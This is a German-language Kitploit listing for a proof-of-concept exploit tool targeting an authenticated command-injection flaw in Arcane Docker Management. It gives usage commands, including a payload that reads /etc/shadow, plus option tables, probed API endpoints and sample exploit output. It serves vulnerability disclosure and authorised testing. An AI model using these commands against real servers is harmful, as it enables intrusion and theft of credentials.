Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
POC-CVE-2026-23520 — Proof-of-Concept-Exploit für CVE-2026-23520, eine authentifizierte RCE in Arcane Docker Management über OS-Command-Injection in Lifecycle-Labels. Enthält Check-, Exploit- und Generate-Modi. | Kitploit
Tools/GitHubGitHub/augmaster/poc-cve-2026-23520
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed Teaming
GitHubaugmaster/poc-cve-2026-23520

POC-CVE-2026-23520

Proof-of-Concept-Exploit für CVE-2026-23520, eine authentifizierte RCE in Arcane Docker Management über OS-Command-Injection in Lifecycle-Labels. Enthält Check-, Exploit- und Generate-Modi.

Repository anzeigen
2vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-23520 — Arcane Lifecycle Label RCE

OS-Befehls-Injection in Arcane Docker Management (< 1.13.0)

Überblick

Arcane ist eine moderne, webbasierte Docker-Management-Plattform. Versionen vor 1.13.0 sind anfällig für eine authentifizierte Remote Code Execution (RCE) durch OS-Befehls-Injection in den Lifecycle-Labels des Updater-Dienstes.

Der Updater-Dienst unterstützte zwei Docker-Container-Labels:

LabelAuslöser
com.getarcaneapp.arcane.lifecycle.pre-updateVor einem Container-Update
com.getarcaneapp.arcane.lifecycle.post-updateNach einem Container-Update

Der Label-Wert wird direkt an /bin/sh -c übergeben, ohne jegliche Bereinigung. Da jeder authentifizierte Benutzer (nicht nur Administratoren) über die API Projekte erstellen kann, kann ein Angreifer ein vergiftetes Projekt platzieren. Wenn ein Administrator später ein Container-Update auslöst, wird der injizierte Befehl innerhalb des Containers ausgeführt — und möglicherweise auf dem Host, wenn Volume-Mounts vorhanden sind.

Angriffsablauf

root@kitploit:~
 Angreifer (Benutzer mit niedrigen Rechten)        Arcane-Server
 ────────────────────────                           ──────────────
 1. Authentifizierung (beliebiger Benutzer)  ──────────►  JWT ausgestellt
 2. Projekt mit vergiftetem                          Projekt mit
    Lifecycle-Label erstellen  ──────────►  bösartigem Label gespeichert
                                                         │
         ┌───────────────────────────────────────────────┘
         │  3. Administrator löst Container-Update aus
         ▼
    Arcane-Updater liest Label-Wert
    Übergibt ihn an /bin/sh -c
         │
         ▼
    *** Beliebige Befehlsausführung ***
    (Container-Bereich, oder Host, wenn Volumes gemountet sind)

Betroffene Versionen

StatusVersionen
VerwundbarArcane < 1.13.0
BehobenArcane ≥ 1.13.0

Der Fix (Commit 5a9c2f9) entfernt die Lifecycle-Label-Funktion vollständig, um die Angriffsfläche zu beseitigen.

Funktionen

  • Keine Abhängigkeiten — nur stdlib urllib, läuft auf jedem Python 3.10+
  • Robuste Erkundung — probiert still mehrere API-Pfade, Antwort-Schlüsselnamen und Anmeldedaten-Formate aus, um sich an verschiedene Arcane-Versionen und -Konfigurationen anzupassen
  • Drei Modi — check (Fingerabdruck), exploit (Bereitstellung), generate (offline Compose-Datei)
  • Ausführlicher Modus (-v) — zeigt genau, welche Endpunkte untersucht werden und was zurückkommt

Verwendung

Prüfen, ob ein Ziel verwundbar ist

root@kitploit:~
python3 poc_cve_2026_23520.py check -t <TARGET_IP>

Exploit bereitstellen

root@kitploit:~
python3 poc_cve_2026_23520.py exploit \
    -t <TARGET_IP> \
    -u <USERNAME> \
    -p <PASSWORD> \
    --payload "id"

Vergiftete Compose-Datei generieren (offline)

root@kitploit:~
python3 poc_cve_2026_23520.py generate --payload "cat /etc/shadow"

Endpunkt-Erkundung debuggen

root@kitploit:~
python3 poc_cve_2026_23520.py -v check -t <TARGET_IP>

Alle Optionen

root@kitploit:~
usage: poc_cve_2026_23520.py [-h] [-v] {exploit,check,generate} ...

positional arguments:
  {exploit,check,generate}
    exploit             Deploy the poisoned project via the Arcane API
    check               Fingerprint Arcane and check if vulnerable
    generate            Generate a poisoned compose file (no network required)

options:
  -h, --help            show this help message and exit
  -v, --verbose         Show probing debug output

Exploit-Flags:

FlagBeschreibungStandard
-t, --targetArcane-Host (IP oder Hostname)erforderlich
-P, --portArcane-Port3552
-u, --usernameBeliebiger authentifizierter Arcane-Benutzererforderlich
-p, --passwordBenutzerpassworterforderlich
--payloadShell-Befehl zum Injizierenid
--hookpre- oder post-Update-Hookpre
--project-nameName für das vergiftete Projektpoc-cve-2026-23520
--env-idUmgebungs-ID (automatisch erkannt, wenn weggelassen)auto
--schemehttp oder httpshttp
--no-verifyTLS-Zertifikatsprüfung überspringenaus

Endpunkt-Robustheit

Das Skript kodiert keinen einzelnen API-Pfad fest. Stattdessen probiert es still mehrere bekannte Pfade für jede Operation aus und stoppt beim ersten Treffer:

OperationGetestete Endpunkte
Version/api/version, /api/system/version, /api/v1/version, /api/settings/version, /api/status, /api/health, /api/info
Auth/api/auth/login, /api/login, /api/v1/auth/login, /api/auth/signin, /api/users/login
Umgebungen/api/environments, /api/v1/environments, /api/endpoints, /api/v1/endpoints
Projekt erstellen/api/environments/{id}/projects, /api/v1/environments/{id}/projects, /api/projects, /api/v1/projects und weitere

Antwort-Schlüssel werden ebenfalls flexibel abgeglichen (z. B. currentVersion, version, Version, serverVersion — einschließlich verschachtelter Objekte und Groß-/Kleinschreibung-unabhängiger Suche).

Beispielausgabe

root@kitploit:~
   ╔═══════════════════════════════════════════════════════╗
   ║          CVE-2026-23520  PoC Exploit                  ║
   ║    Arcane < 1.13.0 — Lifecycle Label RCE              ║
   ╚═══════════════════════════════════════════════════════╝

  ── Schritt 1 · Ziel-Fingerprinting ──
  [*] Ziel: http://10.129.7.208:3552
  [*] Version-Endpunkte werden untersucht …
  [+] Version über /api/version gefunden
  [+] Arcane-Version: v1.12.4
  [+] Version v1.12.4 ist < 1.13.0 — VERWUNDBAR

  ── Schritt 2 · Authentifizierung ──
  [*] Authentifizierung als Angreifer …
  [+] JWT über /api/auth/login erhalten

  ── Schritt 3 · Umgebungs-Erkennung ──
  [*] Umgebungs-Endpunkte werden untersucht …
  [+] 1 Umgebung(en) über /api/environments gefunden
  [*]   → 1  (lokal)
  [+] Verwende Umgebung: 1

  ── Schritt 4 · Vergiftetes Projekt platzieren ──
  [*] Payload in Lifecycle-Label injizieren: pre-update
  [*] Label : com.getarcaneapp.arcane.lifecycle.pre-update
  [*] Wert  : id
  [+] Projekt über /api/environments/1/projects erstellt

  ── Exploit erfolgreich platziert ──
  [+] Das vergiftete Projekt wartet nun auf einen Update-Auslöser.

Referenzen

  • Advisory: GHSA-gjqq-6r35-w3r8
  • NVD: CVE-2026-23520
  • Fix-Commit: 5a9c2f9
  • Behobene Version: v1.13.0

Haftungsausschluss

Dieses Tool wird ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bereitgestellt. Unbefugter Zugriff auf Computersysteme ist illegal. Der Autor ist nicht für jeglichen Missbrauch verantwortlich. Verwenden Sie dies nur gegen Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Erlaubnis zum Testen haben.

Lizenz

MIT

Tool herunterladen